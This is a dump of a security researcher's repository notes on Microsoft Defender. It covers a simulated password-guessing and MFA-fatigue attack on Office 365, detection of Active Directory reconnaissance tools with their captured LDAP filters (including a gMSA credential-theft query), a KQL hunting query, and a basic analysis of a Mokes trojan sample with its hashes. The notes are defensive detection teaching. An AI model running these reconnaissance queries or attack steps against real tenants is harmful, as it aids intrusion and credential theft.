If you are interested in this simulation, please take a look at [DEV05-CloudID-Exfiltration.md](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV05-CloudID-Exfiltration/DEV05-CloudID-Exfiltration.md).

Thank you, Kijo Ninja

#### Disclaimer
The views and opinions expressed herein are those of the author and do not necessarily reflect the views of the company.
--------------------------------------------------------------------------------
/SecurityResearcher-Note-Folder/Day16-CloudId-Exfiltration-AttackReport-Part1.md:
--------------------------------------------------------------------------------
# Cloud-Based Identity to Exfiltration Attack
Identity attacks have been increasing every single day. Over the past few years, attackers have been observed attempting to transition from on-premises to cloud environments for further exploitation.
Today, I would like to showcase some detection insights regarding attacks, starting from cloud-based identity attacks and extending to a compromised Office 365 environment.

Here is the complete attack scenario that I simulated manually, step by step.

"Assuming the attacker has obtained the email address information and requires a password to log in to Office 365/Outlook, they begin by attempting to access it with various easily guessable passwords at random.
After a few attempts, they manage to guess the password, but their access is blocked by MFA (Multi-Factor Authentication).
Subsequently, they resort to repeatedly requesting MFA approval to exhaust the targeted user, a technique known as MFA fatigue.
Eventually, after 10-15 attempts, the user approves access due to exhaustion."

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/52ece219-1ac1-4dcd-bc52-67cc572a0c4e)

> Cloud-Based Identity to Exfiltration : Attack flow
## Attack Simulation : Part 1
As I've divided this blog into two parts, this part focuses on Part 1, examining cloud-based identity attacks leading up to successful logins to Outlook.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/e5f31691-69d4-41e6-ae72-0b6651b82231)

Firstly, I'd like to highlight how Microsoft Defender XDR is excellent at visualizing all suspicious activities and correlating them into one incident.
After simulating the entire attack, a series of alerts were gradually generated over time.

**Here are all the alerts generated in Microsoft Defender XDR.**
```
Product : Alert title : MITRE ATT&CK Techniques
------- : --------------------------------------------------- : -----------------------------------------------------------------------------------------------------------------
MDA : Investigation priority score increase :
XDR : Suspicious behavior: Impossible travel activity : T1078.004: Cloud Accounts
XDR : Impossible travel activity : T1078: Valid Accounts, T1078.004: Cloud Accounts
XDR : Multiple Failed Sign-Ins : T1110: Brute Force
XDR : Suspicious behavior: Multiple failed login attempts : T1110: Brute Force, T1212: Exploitation for Credential Access
MDA : Multiple failed login attempts : T1110: Brute Force, T1110.001: Password Guessing
MDA : Activity from a Tor IP address : T1078: Valid Accounts, T1078.004: Cloud Accounts
Entra : Anonymous IP address :
MDA : Logon from a risky IP address :
XDR : Suspicious email forwarding rule : T1114.003: Email Forwarding Rule
MDA : Suspicious inbox forwarding rule : T1114: Email Collection, T1114.003: Email Forwarding Rule
Entra : Anomalous Token :
XDR : Suspicious behavior: Mass delete : T1485: Data Destruction
MDA : Mass delete : T1485: Data Destruction
XDR : Suspicious behavior: Mass download : T1213: Data from Information Repositories, T1530: Data from Cloud Storage, T1039: Data from Network Shared Drive
MDA : Mass download : T1074: Data Staged
XDR : Suspicious massive data read : T1119: Automated Collection, T1213.002: Sharepoint
```

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/520c0525-a251-41ed-8378-381377a54512)
> Attack simulation & Incident in Microsoft Defender XDR

The simulation begins with an identity-based attack, and chronologically, we can observe two "Impossible travel activity" alerts generated by Microsoft Defender for Cloud Apps.
Interestingly, the two "Impossible travel activity" alerts and another alert, "Anonymous IP address", generated by Microsoft Entra ID Protection, are related activities.
***That's why these events and alerts were correlated and generated the "Suspicious behavior: Impossible travel activity" alert by Microsoft Defender XDR in the end.***

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/d6c348df-31aa-4982-9305-63fcada8d97a)
> Impossible travel activity & XDR alert

We observed two alerts of "Impossible Travel activity", but let's investigate why two identical alerts were generated.
***The first one involves travel between Japan and Germany within a 15-minute timeframe.***
Additionally, in this activity, we can confirm that the attacker used a Tor browser.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/cf1b7c05-09aa-4b05-b88c-a974c61a5e3a)
> Impossible Travel activity : Japan - Germany

***The second one involves travel between Japan and the Netherlands within an 18-minute timeframe.***
Similarly to the first one, we can confirm that the attacker used a Tor browser.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/911635f5-c50f-4741-a196-3b6c6ba9eb1d)
> Impossible Travel activity : Japan - Netherlands

> [!Important]
> Now, from these first attempts, we understand that the targeted user usually accesses Office 365 from Japan.
> However, the attacker uses a Tor browser and attempts to access the Office 365 environment anomalously, detected from two locations: Germany and the Netherlands.

The next detected activities were multiple failed sign-ins and login attempts.
These were identified through Microsoft Defender for Cloud Apps, ***revealing that the failures stemmed from incorrect passwords and unapproved MFA requests by the target user.***
The attacker persisted, attempting various commonly used passwords in hopes of success.
Despite eventually discovering the correct password, the attacker was prevented from accessing the account by MFA, which was enabled for the target user in this tenant.
***As the attacker continuously requested MFA and their requests were consistently denied, numerous failed login attempts were logged in Microsoft Defender XDR.
Ultimately, these events were correlated into a single alert: "Suspicious behavior: Multiple failed login attempts".***

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/7655ae26-76f6-479c-ab53-25060c281c2a)

Despite multiple failed attempts and denials of MFA access, the attacker persisted in requesting MFA approval.
***Eventually, the target user approved the access due to tiredness, a technique often exploited in cyber attacks known as MFA fatigue.***
Reviewing the "Activity from a Tor IP address" alert, we can confirm that the attacker successfully accessed Outlook/Microsoft Exchange Online using a Tor browser.
Following the successful login, the attacker proceeded to create forwarding rules to collect data from daily email activities.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/71f51689-9fdd-4a17-9133-2eae8bd1787f)

I hope these insights will be helpful for all. Stay tuned for Part 2, where we'll discuss what happens when the attacker moves to the cloud environment.

#### Disclaimer
The views and opinions expressed herein are those of the author and do not necessarily reflect the views of the company.
--------------------------------------------------------------------------------
/ProductResearch-Note-Folder/Day02-MDE-MDI-BetterTogether-Part2.md:
--------------------------------------------------------------------------------
# MDE + MDI better together - Reconnaissance
Hello, all defenders and threat hunters! Thank you for visiting my product research note.
As we primarily focused on exploring how Microsoft Defender for Endpoint (MDE) and Microsoft Defender for Identity (MDI) work better together,
emphasizing [command-based AD reconnaissance in Part 1](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/ProductResearch-Note-Folder/Day01-MDE-MDI-BetterTogether-Part1.md), this time we are going to shift our focus to AD reconnaissance using some pentesting tools.

## Pentesting tools
Before I begin showcasing MDE + MDI detection, I would like to show a simulation.
The simulation itself is quite simple: install the pentesting tools and run them on a compromised AD-joined device.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b859cdc9-fddd-4b8d-8948-105005dc070b)

> [!Important]
> These tools are used for attack simulation in this blog. Please use them in a testing environment and avoid using them in a production environment.
> 1. ORADAD - https://github.com/ANSSI-FR/ORADAD
> 2. NetSess - https://www.joeware.net/freetools/tools/netsess/
> 3. ADRecon - https://github.com/sense-of-security/ADRecon

## Detection, XDR
After running the three tools on the compromised AD-joined device, 1 incident (correlated with 9 alerts generated from MDE & MDI) appeared on the Incident page of the Microsoft Defender XDR portal.
As I primarily used three tools, let's take a look at how these tools are mapped on alert pages in the context of MDE and MDI.

```
Incident : Multi-stage incident involving Credential access & Discovery on one endpoint reported by multiple sources
Alerts : Detection source, Alert name
- EDR, Possible Active Directory data enumeration using ADRecon
- EDR, Suspicious sequence of exploration activities
- EDR, Suspicious User Account Discovery
- EDR, Credential theft attempt of Group Managed Service Accounts (gMSA)
- EDR, Suspicious LDAP query
- EDR, Active Directory Certificate Services attack tool activity
- MDI, User and IP address reconnaissance (SMB)
- MDI, Security principal reconnaissance (LDAP)
- Defender XDR, Enumeration of SMB sessions on a domain controller
```
> All generated alerts after the simulation in Incident

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/97dcd6a3-c6cb-447e-be0d-9933234f99c0)
> Incident page : Multi-stage incident involving Credential access & Discovery on one endpoint reported by multiple sources

### ORADAD tool detection in MDE & MDI
At first, this alert was generated by MDI when the MDI sensor detected suspicious activity from Win10BB.
The MDI sensor raised an alert as Win10BB (compromised device) sent a suspicious LDAP query to the Domain Controller for enumeration.
It's worth noting that MDI covers a range of enumeration types, such as ***"AllObjects", "AllComputers", "AllUsers", and "AllGroupPolicies"***.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/0ff61b3a-9e7a-4de7-9f72-325a6896721c)
> MDI alert, Security principal reconnaissance (LDAP)

In terms of MDE detection, I observed three alerts :
- [x] Suspicious LDAP Query
- [x] Active Directory Certificate Services Attack Tool Activity
- [x] Credential theft attempt of Group Managed Service Accounts (gMSA)

These alerts shed light on the tool the attacker executed on Win10BB, even capturing each LDAP query performed by the tool (ORADAD) as follows.

```query
< ----- Suspicious LDAP Query ----- >
LDAP Search query (objectClass=group), Distinguished name CN=Configuration,DC=mdipoc,DC=com
LDAP Search query (|(objectClass=domain)(objectClass=domainDNS)), Distinguished name DC=mdipoc,DC=com
LDAP Search query (&(objectClass=user)(!(|(objectClass=computer)(objectClass=msDS-ManagedServiceAccount)(objectClass=msDS-GroupManagedServiceAccount)))), Distinguished name DC=mdipoc,DC=com

< ----- Active Directory Certificate Services Attack Tool Activity ----- >
LDAP Search query (objectClass=pKICertificateTemplate), Distinguished name CN=Configuration,DC=mdipoc,DC=com

< ----- Credential theft attempt of Group Managed Service Accounts (gMSA) ----- >
LDAP Search query (objectClass=msDS-GroupManagedServiceAccount), Distinguished name DC=mdipoc,DC=com
```

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/e6a9a092-7e12-46fd-956f-f4b9d251dc91)
> MDE alerts, which highlight some of the LDAP query executions

### NetSess tool detection in MDE & MDI
Secondly, NetSess tool activity was captured by MDI and Defender XDR, initially detected by MDE through XDR alert correlation.
From the SOC team's perspective, this not only enables them to identify instances of "User and IP address reconnaissance" but also provides insights into ***how attackers executed tools,
the specific commands they used, and the timeline associated with these actions from an endpoint perspective.***

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/0129fe1d-9600-475e-adb1-bab39dfef2a8)
> Defender XDR, Enumeration of SMB sessions on a domain controller

For instance, the MDI alert indicates that Mike Ninja on Win10BB (compromised device) initiated a session on the DC and is attempting to gather recent logon information, such as IP address and user.
However, what we would like to identify is more detailed activity, especially how this activity was performed by the attacker.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/7fa1df61-9aac-4f63-b802-b782167c7845)
> MDI alert, User and IP address reconnaissance (SMB)

One of the significant advantages of deploying MDE is the ability to capture SMB session activities from the endpoint perspective.
When reviewing MDE alert detections, we can clearly discern the tools employed by attackers and even the specific command lines they used.
Additionally, MDE captures hash values and offers file detection insights from VirusTotal.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/efd4956c-db6d-412d-b1a3-622673111cdc)
> Defender XDR, Enumeration of SMB sessions on a domain controller

### ADRecon tool detection in MDE
Lastly, the attacker ran ADRecon, triggering alerts in MDE.
Notably, MDE promptly captured the suspicious activities, identifying them as the ADRecon tool.
Furthermore, MDE provided a comprehensive list of all files created during the ADRecon enumeration in the alert.
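The LDAP filters that MDE surfaced in the ORADAD alerts above (and that ADRecon issues in the same way) can be hunted directly from endpoint telemetry, so the reconnaissance is visible even on days when no alert fires. The KQL below is an added example of mine, not the post's or Microsoft's query; it assumes that DeviceEvents records LDAP searches as ActionType "LdapSearch" with SearchFilter and DistinguishedName keys inside AdditionalFields, and the thresholds are constructed starting points.

```kql
// Added example, not from the original post: find tool-driven LDAP reconnaissance from
// DeviceEvents. Assumption (verify in your tenant): ActionType "LdapSearch" with
// SearchFilter and DistinguishedName keys inside AdditionalFields.
let lookback = 7d;
DeviceEvents
| where Timestamp > ago(lookback)
| where ActionType == "LdapSearch"
| extend AF = parse_json(AdditionalFields)
| extend SearchFilter = tostring(AF.SearchFilter),
         SearchBase   = tostring(AF.DistinguishedName)
// object classes the post's alert excerpts enumerate: groups, the domain object, users,
// certificate templates and gMSA accounts
| where SearchFilter matches regex @"(?i)objectClass=(group|domain|domainDNS|user|pKICertificateTemplate|msDS-GroupManagedServiceAccount)"
| summarize
    Queries         = count(),
    DistinctFilters = dcount(SearchFilter),
    Filters         = make_set(SearchFilter, 20),
    Bases           = make_set(SearchBase, 5),
    FirstSeen       = min(Timestamp),
    LastSeen        = max(Timestamp)
    by DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName,
       InitiatingProcessCommandLine, InitiatingProcessSHA1
// tools such as ORADAD and ADRecon walk several broad classes from one process within minutes;
// an admin console or a one-off script rarely issues more than one or two
| where DistinctFilters >= 3 and datetime_diff("minute", LastSeen, FirstSeen) <= 30
| order by DistinctFilters desc, Queries desc
```

The InitiatingProcessSHA1 column in the result is what you pivot on to confirm the tool, the same way the MDE alert pages above show the hash and VirusTotal verdict.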

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/f49ecfcc-e36d-4547-b267-8b98dc37aa0d)
> MDE alert, Possible Active Directory data enumeration using ADRecon

Another alert from MDE indicates the execution of PowerShell cmdlets (performed by the ADRecon tool) on the endpoint.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/31317e90-158e-44f2-94e9-a282e7689c5c)
> MDE alert, Suspicious sequence of exploration activities

In 'MDE + MDI: Better Together Part 1 & Part 2', I explored reconnaissance detection, emphasizing the robust detection capabilities when both products are used in tandem.
I plan to delve into additional insights such as hunting, response, and other attack phases in the future. Thank you for reading !!

#### Disclaimer
The views and opinions expressed herein are those of the author and do not necessarily reflect the views of the company.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/f372dead-b41c-417a-8d10-f76cde1bcd32)


### Welcome to @SecurityResearcher-Note
In this repository, I will cover various security approaches to attack techniques and share new discoveries about security breaches. Through the new discoveries and learnings shared in this repository, I hope to provide helpful insights for those involved in security operations, hunting, incident response, and more.

1. [Security Research-Note](https://github.com/LearningKijo/SecurityResearcher-Note#security-research-note)
2. [Product Research-Note](https://github.com/LearningKijo/SecurityResearcher-Note#product-research-note)


## Security Research-Note
| Day | Title | Comment |
|:-----|:------|:--------|
| Day1 | [Day1-Basic-Malware-Analysis.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day01-Basic-Malware-Analysis.md) | |
| Day2 | [Day2-APT29-Part1-Overview.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day02-APT29-Part1-Overview.md)<br>[Day2-APT29-Part2-Midnight-Blizzard.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day02-APT29-Part2-Midnight-Blizzard.md)<br>[Day2-APT29-Part3-Midnight-Blizzard.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day02-APT29-Part3-Midnight-Blizzard.md)<br>[Day2-APT29-Part4-Midnight-Blizzard-MDE-EvaluationLab.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day02-APT29-Part4-Midnight-Blizzard-MDE-EvaluationLab.md) | Russia-based activity group |
| Day3 | [Day3-Microsoft-ThreatActorNamingTaxonomy.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day03-Microsoft-ThreatActorNamingTaxonomy.md) | |
| Day4 | [Day4-Mango-Sandstorm-Part1-Overview.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day04-Mango-Sandstorm-Part1-Overview.md)<br>[Day4-Mango-Sandstorm-Part2-AttackTechniques-Insights.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day04-Mango-Sandstorm-Part2-AttackTechniques-Insights.md)<br>[Day4-Mango-Sandstorm-Part3-AttackTechniques-Insights.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day04-Mango-Sandstorm-Part3-AttackTechniques-Insights.md) | Iran-based activity group |
| Day5 | [Day5-AntivirusConfig-Tips.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day05-AntivirusConfig-Tips.md) | EPP |
| Day6 | [Day6-M365D-XDR-AutomaticAttackDisruption.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day06-M365D-XDR-AutomaticAttackDisruption.md) | AiTM, BEC,<br>Human-operated ransomware |
| Day7 | [Day7-AiTM-Insights-XDR.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day07-AiTM-Insights-XDR.md) | AiTM, BEC |
| Day8 | [Day8-WebShell-Insights-XDR.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day08-WebShell-Insights-XDR.md) | Web shell |
| Day9 | [Day9-XDR-Insights-part1.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day09-XDR-Insights-part1.md) | XDR |
| Day10 | [Day10-XDR-Insights-part2.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day10-XDR-Insights-part2.md) | XDR |
| Day11 | [Day11-MalwareAnalysis-Insights-part1.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day11-MalwareAnalysis-Insights-part1.md)<br>[Day11-MalwareAnalysis-Insights-part2.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day11-MalwareAnalysis-Insights-part2.md) | Malware Analysis<br>EDR, XDR |
| Day12 | [Day12-Volt-Typhoon-Base64.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day12-Volt-Typhoon-Base64.md)<br>[Day12-Volt-Typhoon-Base64.pdf](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day12-Volt-Typhoon-Base64.pdf) - *PDF* | China-based activity group<br>Base64, Credential dumping |
| Day13 | [Day13-WDigest-credential-harvesting-attack.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day13-WDigest-credential-harvesting-attack.md) | WDigest, Mimikatz |
| Day14 | [Day14-macOS-SIP-Bypass-Insights.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day14-macOS-SIP-Bypass-Insights.md) | SIP Bypass<br>macOS vulnerability |
| Day15 | [Day15-XDR-Insights-2024update.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day15-XDR-Insights-2024update.md) | XDR |
| Day16 | [Day16-CloudId-Exfiltration-AttackReport-Part1.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day16-CloudId-Exfiltration-AttackReport-Part1.md)<br>[Day16-CloudId-Exfiltration-AttackReport-Part2.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day16-CloudId-Exfiltration-AttackReport-Part2.md) | Identity abuse<br>Exfiltration |
| Day17 | [Day17-Hunting-APIcalls-insight.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day17-Hunting-APIcalls-insight.md) | API, MDE |
| Day18 | [Day18-LotL-detection-part1.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day18-LotL-detection-part1.md) | LotL |
| Day19 | [Day19-ThreatActor-Discovery.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day19-ThreatActor-Discovery.md) | Discovery |
## Product Research-Note
| Day | Title | Comment |
|:-----|:------|:--------|
| Day1 | [Day01-MDE-MDI-BetterTogether-Part1.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/ProductResearch-Note-Folder/Day01-MDE-MDI-BetterTogether-Part1.md) | Reconnaissance, SAMR |
| Day2 | [Day02-MDE-MDI-BetterTogether-Part2.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/ProductResearch-Note-Folder/Day02-MDE-MDI-BetterTogether-Part2.md) | Reconnaissance, SMB, LDAP |
| Day3 | [Day03-MDO-FileDetonation-DeepAnalysis.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/ProductResearch-Note-Folder/Day03-MDO-FileDetonation-DeepAnalysis.md) | FileDetonation, DeepAnalysis |
| Day4 | [Day04-MDI-DeploymentConsiderations.pdf](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/ProductResearch-Note-Folder/Day04-MDI-DeploymentConsiderations.pdf) | ITDR, MDI |

## Microsoft Copilot for Security, ***Kijo Catchup LOG***
| LOG | Title |
|:-------|:------|
| LOG-01 | [Microsoft Copilot for Security / Update history](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/CopilotLOGs/01-CopilotForSecurity-History.md) |

## Other
#### Microsoft Security Blog
- Jul 31 2023, [AiTM & BEC threat hunting with KQL](https://techcommunity.microsoft.com/t5/azure-data-explorer-blog/aitm-amp-bec-threat-hunting-with-kql/ba-p/3885166)

#### Event Speaker
#### [Microsoft 365 Defender Virtual Ninja Training](https://adoption.microsoft.com/en-us/ninja-show/)
- November 8 2023, [Advanced Hunting & Data visualization in Microsoft 365 Defender](https://www.youtube.com/watch?v=2jSqr-nzWn8&ab_channel=MicrosoftSecurityCommunity)
- November 8 2023, [The Virtual Ninja Show | Season 6 Episode 2](https://techcommunity.microsoft.com/t5/security-compliance-and-identity/the-virtual-ninja-show-season-6-episode-2/ev-p/3969120)

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/64097aa2-092d-464b-b879-2e2ce26d56d5)

#### Disclaimer
The views and opinions expressed herein are those of the author and do not necessarily reflect the views of the company.
--------------------------------------------------------------------------------
/SecurityResearcher-Note-Folder/Day11-MalwareAnalysis-Insights-part1.md:
--------------------------------------------------------------------------------
# Day 11 - XDR insights - File Analysis <1/1>
Thank you for visiting my XDR blog. This post specifically delves into analyzing malware file information from generated alerts in Microsoft 365 Defender.
The blog primarily focuses on the foundational aspects of malware analysis, excluding intricate content such as reverse engineering or complex debugging.
While I extensively cover Microsoft 365 Defender, I will also utilize third-party tools for in-depth analysis.

## What insights can we extract from alerts?
When alerts are generated, Microsoft Defender Antivirus and Microsoft Defender for Endpoint provide a wealth of valuable insights on the alert page. Before diving into each of these insights, I'd like to highlight some key points to check within the alerts section of the Microsoft 365 Defender portal.

> [!Note]
> **General data** : SHA256, SHA1, MD5, Signer, File Prevalence, Detection
11 | > **Malware type** : Microsoft Malware family, VirusTotal
12 | > **PE file analysis** : File Content
13 | > **PE file behavior** : Deep analysis 14 | 15 | 16 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b15b25fa-4167-434a-adbc-29fb86c9786c) 17 | 18 | > High-Level Architecture of PE File Analysis in Microsoft 365 Defender 19 | 20 | ## General data 21 | Initially, you can identify fundamental details such as Hash, Signer, Path, File Prevalence, and Detection directly on the alerts page. 22 | These insights are crucial for comprehending the malware investigation's overall mapping. Below is the output derived from an example malware. 23 | 24 | | Data | Details | 25 | |:-------|:---------------| 26 | | Hash | MD5 : 5a54de0db43a7512621f0bf10f1c463a
SHA1 : 275e8cb6734e4cadafd6648188ef906e5a096940
SHA256 : eef2be5347236331ecd365bdf33ef868b6518beb7ae94074be56f955d2a951d7 | 27 | | File Name | TypeA.exe, **Original name : [supr.exe]** | 28 | | File Type | PE, True | 29 | | Signer | ***Unsigned file, This file's signer is unknown*** | 30 | | Path | C:\Users\kijo\Desktop\TypeA.exe | 31 | | File prevalence | Organization devices 2, Organization cloud apps 0, Worldwide devices 2 | 32 | 33 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/cc3b5ca7-6080-4ad9-8fd2-a86b3f8ef314) 34 | 35 | 36 | > [!Important] 37 | > This is a sample malware - MalwareBazaar Database, [Trojan:MSIL/Mokes.B!MTB](https://bazaar.abuse.ch/sample/eef2be5347236331ecd365bdf33ef868b6518beb7ae94074be56f955d2a951d7/#intel). I recommend testing it within ***a sandbox environment***. 38 | 39 | ### Malware detection engines ? 40 | Microsoft Defender Antivirus employs multiple detection engines on both the client and cloud sides to identify advanced malware. 41 | On the alert page, you can determine which engine detected the specific malware. For more detailed insights, this [blog](https://www.microsoft.com/en-us/security/blog/2019/06/24/inside-out-get-to-know-the-advanced-technologies-at-the-core-of-microsoft-defender-atp-next-generation-protection/) provides an understanding of each detection engine's capabilities. 42 | 43 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/1f2e89a4-f4bd-4cd5-81de-e1dfae8b97d3) 44 | 45 | 46 | ## Malware type 47 | When investigating alerts, you'll not only find malware information, but also malware characteristics, including the type of malware and how it's detected by other 3rd-party antivirus tools. Here, Figure 1 provides an example of malware detection within the alert page of Microsoft 365 Defender. 
48 | 49 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/758b0fc1-7d82-417a-9535-aab8e979d4bb) 50 | 51 | > Figure 1, Alert page in Microsoft 365 Defender 52 | 53 | From the malware detection [(malware family)](https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/malware-naming?view=o365-worldwide) on the alert page, we can read the Microsoft naming convention directly: the family is Mokes, the type is Trojan, and the platform is MSIL, which means the sample was compiled to .NET intermediate language (the output of C#, VB.NET and other .NET compilers) rather than to native code. The "Variant" label (.B) indicates that this is not the first variant of the family that Microsoft has catalogued. The "!MTB" suffix describes the detection rather than the sample's capabilities; in particular, nothing in the name says that this malware encrypts data, so any such capability has to be established from behavioral analysis, not from the name. 54 | 55 | | Malware name | Details | 56 | |:--------------|:-------------------| 57 | | Trojan:MSIL/Mokes.B!MTB | Type : Trojan
Platform : MSIL, .NET intermediate language scripts
Family : Mokes
Variant : .B
!Suffixes : !MTB, a detection suffix that does not describe what the file does | 58 | 59 | 60 | 61 | This malware has been detected by 56 different 3rd-party antivirus engines and is consistently categorized as a Trojan on [VirusTotal](https://www.virustotal.com/gui/home/upload). Additionally, specific characteristics have been highlighted, such as "downloader" and "dropper", which indicate that the malware can reach an IP address or URL and pull down further files for later stages of the attack. 62 | 63 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/08a17126-e4ff-4de9-8f5b-67a02b16ccbe) 64 | 65 | ## Malware behaviors 66 | Through [deep analysis](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-file-alerts?view=o365-worldwide#deep-analysis) in Microsoft Defender for Endpoint, you can access deeper insights into the malware's behavior. 67 | Normally this kind of basic dynamic analysis means detonating the sample yourself with tools such as Process Hacker, Process Monitor and Wireshark. 68 | Deep analysis instead detonates the file in a Microsoft-hosted cloud sandbox, so analysts can observe its behavior without running it on a machine of their own. 69 | 70 | Here is a summary of ***[Behaviors]***, categorized with each section along with a brief explanation. 71 | 72 | | Behaviors | Details | 73 | |:----------|:-------------| 74 | | Communication | Clusters network communication related behaviors. | 75 | | Environment Awareness | Clusters environment awareness related behaviors, such as querying for host information. Such behaviors can be associated with sandbox detection. | 76 | | Installation and persistency | Clusters installation and persistency related behaviors, such as dropping files to interesting places, setting files to be loaded when Windows starts, etc. 
| 77 | | Interaction With System Processes | Clusters interaction with system processes behaviors, such as memory injection to svchost.exe | 78 | | Miscellaneous | Clusters miscellaneous behaviors which are not directly related to any other capability. | 79 | | Security Degradation | Clusters security degradation related behaviors, such as disablement of security features. | 80 | 81 | The ***[Observables]*** section lists the files and IPs seen while the sample ran in deep analysis. Hashes are not shown for the dropped files, so they cannot be looked up on VirusTotal directly; the file names and paths are still valuable because they show what the sample creates or downloads. Several of the IPs look suspicious, and VirusTotal already flags some of them as malicious. 82 | 83 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/872b2049-48a2-4a4a-a1ca-2b138e5aa6fe) 84 | 85 | Thanks to [the recent update](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/new-file-analysis-and-pivoting-capabilities-in-microsoft-365/ba-p/3853313), Microsoft 365 Defender now provides additional PE insights, including Strings, Imports, Exports, MITRE ATT&CK, and more. In this context, I can examine numerous string values, which are highly valuable for understanding how this malware was constructed. 86 | 87 | By examining the strings in [file content](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/investigate-files?view=o365-worldwide), it becomes evident that the malware imports from mscoree.dll (the .NET runtime loader) and its related API calls, which is consistent with the MSIL platform in the detection name. The original file name [super.exe] is also visible. Because strings may be obfuscated, third-party tools may be needed to decode them. 
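As an added example that is not part of the original post, the Python below reproduces the static checks behind the General data, Malware type and File content sections above: the three hashes used to pivot to VirusTotal and MalwareBazaar, the MZ/PE signature check, a strings pass, a decode attempt on strings that look like Base64 (a common light obfuscation), and a parser for the Microsoft detection-name format. It runs over a constructed byte buffer that stands in for a sample; the buffer, the embedded strings and the detection names used in the usage section are constructed and are not the Mokes file from the alert.

```python
import base64
import binascii
import hashlib
import re
import struct

# Constructed stand-in for a sample: a minimal DOS header whose e_lfanew points at a
# "PE\0\0" signature, followed by a few strings a .NET PE typically carries and one
# Base64 blob. This is not the Mokes sample; it only exercises the checks below.
SAMPLE_BYTES = (
    b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x80)      # e_lfanew (offset 0x3C) -> 0x80
    + b"\x00" * (0x80 - 64)                              # pad up to the PE header
    + b"PE\x00\x00" + struct.pack("<H", 0x14C)          # signature + Machine = i386
    + b"\x00" * 20
    + b"mscoree.dll\x00_CorExeMain\x00supr.exe\x00"     # .NET loader import, original name
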